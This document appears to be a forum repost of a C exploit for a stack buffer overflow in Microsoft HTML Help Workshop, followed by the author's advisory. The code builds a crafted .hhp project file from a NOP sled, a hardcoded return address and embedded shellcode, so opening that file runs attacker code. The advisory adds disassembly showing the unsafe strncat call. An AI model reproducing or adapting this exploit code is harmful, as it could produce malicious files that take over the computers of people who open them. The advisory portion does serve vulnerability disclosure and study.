/*
\ Windows HTML Help Workshop Index File Stack Overflow Exploit
/ by Darkeagle
\
/ [http://eagle.blacksecurity.org]
\
/ MS coders codes so secure code. Keep coding }:>
\
/ Original Advisory: http://eagle.blackse...v/55k700206.txt
\
/ Exploit tested in WinXP SP2 RUS.
\
*/
#include <stdio.h>
#include <string.h>
#include "stdafx.h"
char ep[]=
"[OPTIONS]\n"
"Compatibility=1.1 or later\n"
"Compiled file=XAKEP.chm\n"
"Index File=";
char pro[]=
"Display compile progress=No\n"
"Language=0x43f Êàçàõñêèé\n\n\n"
"[INFOTYPES]";
char shellcode[]=
"\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02"
"\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48"
"\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4"
"\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12"
"\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69"
"\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6"
"\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5"
"\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21"
"\x61\xdd\x0e\x4d";
int main(int argc,char *argv[])
{
printf("Windows HTML Help Workshop Index File stack overflow exploit\n");
printf("\nBug discovered && exploited by darkeagle of Unl0ck Researchers");
printf("\nWeb page: [url="http://eagle.blacksecurity.org");"]http://eagle.blacksecurity.org");[/url]
FILE *vuln;
char overflow[800];
vuln = fopen("eagle.hhp","w+");
memset(overflow, 0x90, 800);
*(long*)&overflow[280] = 0x77E859BA;
memcpy(overflow+292, &shellcode, sizeof(shellcode));
if(vuln)
{
fprintf(vuln,"%s%s\n%s",ep,overflow,pro);
fclose(vuln);
}
return 0;
}
-----------------------------------------------------
\*
/ Unl0ck Research Team Security Advisory
\
/ product: HTML Help Workshop (1994-1999)
\ bug : stack overflow
/ vendor : Microsoft Corp. (http://microsoft.com)
\ date : 13.02.06
/ author : darkeagle
\
/ Info:
\ stack based buffer overflows were founded in HTML HW.
/ HTML HW crashes when user opens specially crafted .hhp file.
\
/ Details:
\ another buffer overflows were founded in parsing tag's arguments.
Index File=aaaaaaaaaaaaaaaa..
Sample list file=aaaaaaaa....
maybe others. I'm too lazy to continue my HTML Workshop researching.
Look at below code:
.text:0041C60F loc_41C60F: ; CODE XREF: sub_41C4FA+111j
.text:0041C60F test eax, eax
.text:0041C611 jz short loc_41C626
.text:0041C613 push dword ptr [ebx+68h]
.text:0041C616 push offset aIndexFile ; "Index file="
.text:0041C61B push dword ptr [ebx+0D4h]
.text:0041C621 call sub_41CC27
// sub_41CC27
.text:0041CC35 mov ebx, 400h // 1024 bytes
...
.text:0041CC54 sub edi, ecx
.text:0041CC56 push ebx ; size_t
.text:0041CC57 mov eax, ecx
.text:0041CC59 mov esi, edi
.text:0041CC5B mov edi, [ebp-10h]
.text:0041CC5E push dword ptr [ebp+10h] ; char *
.text:0041CC61 shr ecx, 2
.text:0041CC64 rep movsd
.text:0041CC66 mov ecx, eax
.text:0041CC68 and ecx, 3
.text:0041CC6B rep movsb
.text:0041CC6D push dword ptr [ebp-10h] ; char *
.text:0041CC70 call ds:strncat
vulnerable program uses strncat() to copying tags. it looks like:
...
strncat(aIndexFile, ebx+0D4, 1024);
...
/
\ Microsoft coders codes so secure code. Keep continue coding like this.
/
\
/ PoC:
\ Proof of Concept code can be downloaded from http://eagle.blacksecurity.org
/ Greets:
\ rst/ghc { ed, uf0, fost },
uKt { choix, nekd0, payhash, antq },
blacksecurity { #black } ,
0x557 { kaka, swan, sam, nolife },
sowhat, tty64 { izik };
/
\
/ © 2004 [-] 2006
\
*/
Sponsored by: â–ˆ Sparkhost - Hosting Without Compromises! â–ˆ Hybrid Performance Web Hosting â–ˆ Spark Host Stream Hosting â–ˆ Hybrid IRC & IRCd Server Shell Accounts
Microsoft Html Help Workshop ".hhp" File Handling Buffer Overflow Exploit #3
Started by
Guest_musictheft_*
, Feb 14 2006 05:06 AM
No replies to this topic
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users
